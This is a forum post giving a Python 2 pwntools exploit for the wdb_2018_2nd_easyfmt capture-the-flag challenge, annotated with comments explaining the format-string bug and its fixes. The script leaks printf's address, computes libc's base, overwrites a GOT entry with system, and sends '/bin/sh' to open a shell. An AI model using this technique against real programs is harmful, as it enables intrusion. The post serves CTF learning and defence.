roger 发表于 2020-8-31 17:14:15

王鼎杯wdb_2018_pwn_2nd-easyfmt-89

exp
from pwn import *

# Exploit script for the wdb_2018_2nd_easyfmt challenge (Python 2 / pwntools).
# Vulnerability class exercised: the target hands user input to printf() as
# the format string, which gives an arbitrary read (`%N$s`) and an arbitrary
# write (`%N$hhn`, here generated by fmtstr_payload()).  From a defensive
# view the fix is printf("%s", buf) plus -Wformat-security / -Werror=format
# at build time, and Full RELRO so that the address written below is
# read-only at runtime -- assuming 0x804A014 is a GOT entry, which the
# script implies (it reads printf's runtime address from it) but never states.
# NOTE(review): Python 2 only -- `print` statements, `/` as integer division
# and str + p32() concatenation all break under Python 3.
context.log_level = 'debug'
p = process('./wdb_2018_2nd_easyfmt')
#p = process('./idaidg/linux_server')
#p = remote('node3.buuoj.cn',29254)
elf = ELF('./wdb_2018_2nd_easyfmt')
# libc is the one the local loader resolves for the binary; the symbol
# offsets used below only match a remote target running the same libc build.
libc = elf.libc
#libc = ELF('./libc/libc-2.23x86.so')

p.recvuntil('Do you know repeater?')

# Leak step: the buffer starts with the address 0x804A014, and `%6$s` prints
# the bytes stored there (the buffer sits at format argument 6, the same
# offset passed to fmtstr_payload() further down).
p.send(p32(0x804A014) + '%6$s')
p.recv()
#sleep(1)
# Takes the 4 bytes ending at the first 0xf7 byte as the leaked pointer --
# assumes the leaked 32-bit libc address has 0xf7 as its most significant
# byte; the script treats that value as printf's runtime address.
printf = p.recvuntil('\xf7')[-4:]
printf_addr = u32(printf)
print 'printf_addr:' + hex(printf_addr)

# libc base = leaked printf address - printf's offset within libc.
libcbase = printf_addr - libc.symbols['printf']

print"libcbase:"+ hex(libcbase)

#gdb.attach(p)

system = libcbase + libc.symbols['system']

print"system:"+hex(system)

# `system` split into its four bytes, least significant first
# (a1 = bits 0-7, a4 = bits 24-31).  Only the hand-built `payload` below uses
# them, and that payload is never sent.
a1 = system % (16*16)
a2 = (system / (16*16))%(16*16)
a3 = (system / (16*16*16*16))%(16*16)
a4 = (system / (16*16*16*16*16*16))%(16*16)

print"a1,a2,a3,a4:"+hex(a1)+','+hex(a2)+','+hex(a3)+','+hex(a4)
# The write that is actually sent: pwntools generates the `%hhn` sequence
# that stores `system` at 0x804A014, with the buffer at format offset 6.
payload1 = fmtstr_payload(6,{0x804A014:system})

# NOTE(review): dead code -- `payload` is assembled (four consecutive target
# addresses = 16 bytes, then one `%<width>c%N$hhn` per byte, each width
# computed relative to the bytes already printed and wrapped through 0x100)
# but it is never sent; only `payload1` is used below.
payload = p32(0x804A014)
payload += p32(0x804A014 + 1)
payload += p32(0x804A014 + 2)
payload += p32(0x804A014 + 3)
payload += '%'
payload += str(a1 - 16)
payload += 'c%6$hhn'
payload += '%'
payload += str((0x100+a2) - a1)
payload += 'c%7$hhn'
payload += '%'
payload += str((0x100+a3) - a2)
payload += 'c%8$hhn'
payload += '%'
payload += str((0x100+a4) - a3)
payload += 'c%9$hhn'

sleep(1)

# Overwrite the pointer at 0x804A014 with the address of system.
p.send(payload1)

sleep(1)
# The next input goes through the same call path; after the overwrite it is
# presumably received by system() instead -- inferred from the write above,
# the binary itself is not on this page.
p.send('/bin/sh\x00')

p.interactive()

